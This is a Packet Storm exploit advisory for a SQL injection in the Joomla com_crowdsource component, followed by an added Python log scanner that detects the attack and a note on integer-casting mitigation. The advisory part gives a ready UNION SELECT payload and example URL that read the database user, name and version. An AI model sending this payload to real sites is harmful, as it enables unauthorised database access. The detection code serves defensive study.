Joomla Crowdsource SQL Injection

2010-05-19T00:00:00
ID PACKETSTORM:89639
Type packetstorm
Reporter ByEge
Modified 2010-05-19T00:00:00

Description

                                        
                                            `  
  
  
[!] Title: Joomla Component com_crowdsource SQL Injection   
  
[!] Date: 16.05.2010  
  
[!] Author: ByEge  
  
[!] Homepage: byege.blogspot.com  
  
[+]########################################################################################################################################################[+]  
  
  
[!] ExploiT :  
  
-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--  
  
[!] Example :  
  
http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--  
  
  
[+]########################################################################################################################################################[+]  
  
[!] Th4nks : Fantastik, MitolocyA, ISYAN,   
  
  
  
  
`
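A defender-side check for the request pattern in this advisory, added here as an example and not part of the original Packet Storm entry: it scans web access logs for `com_crowdsource` requests whose `cid` parameter is not a plain integer, normalising the `/**/` comment padding and mixed-case keywords the advisory's request uses. It assumes `cid` is normally a non-negative integer id and that logs are in Apache common/combined format; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration (IPs, times and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/May/2010:10:01:00 +0000] "GET /index.php?option=com_crowdsource&view=design&cid=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/May/2010:10:02:13 +0000] "GET /index.php?option=com_crowdsource&view=design&cid=-3/**/uNIOn/**/sELECt/**/1,2,3/**/-- HTTP/1.1" 200 5533',
    '192.0.2.44 - - [19/May/2010:10:02:20 +0000] "GET /index.php?option=com_crowdsource&view=design&cid=-3%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 5533',
    '192.0.2.77 - - [19/May/2010:10:03:02 +0000] "GET /index.php?option=com_crowdsource&view=design&cid=3abc HTTP/1.1" 200 4800',
    '192.0.2.10 - - [19/May/2010:10:04:00 +0000] "GET /index.php?option=com_content&id=7 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
SQL_TOKEN_RE = re.compile(r"\b(union|select|concat(?:_ws)?|information_schema)\b", re.I)

def classify_cid(url):
    """Return None (other component), 'ok', 'non-integer' or 'sqli' for one request URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # percent-decodes values
    if "com_crowdsource" not in query.get("option", []):
        return None
    verdict = "ok"
    for value in query.get("cid", []):
        if re.fullmatch(r"\d+", value.strip()):
            continue  # assumption: a plain non-negative integer is the only expected shape
        # Inline comments stand in for spaces in the advisory's request; normalise them first.
        if SQL_TOKEN_RE.search(SQL_COMMENT_RE.sub(" ", value)):
            return "sqli"
        verdict = "non-integer"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for each com_crowdsource request with a suspect cid."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        verdict = classify_cid(match.group(1)) if match else None
        if verdict in ("sqli", "non-integer"):
            hits.append((number, verdict))
    return hits

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The same integer-only rule is the mitigation on the application side: a `cid` value that is cast to an integer or bound as a query parameter cannot carry a `UNION SELECT` into the statement.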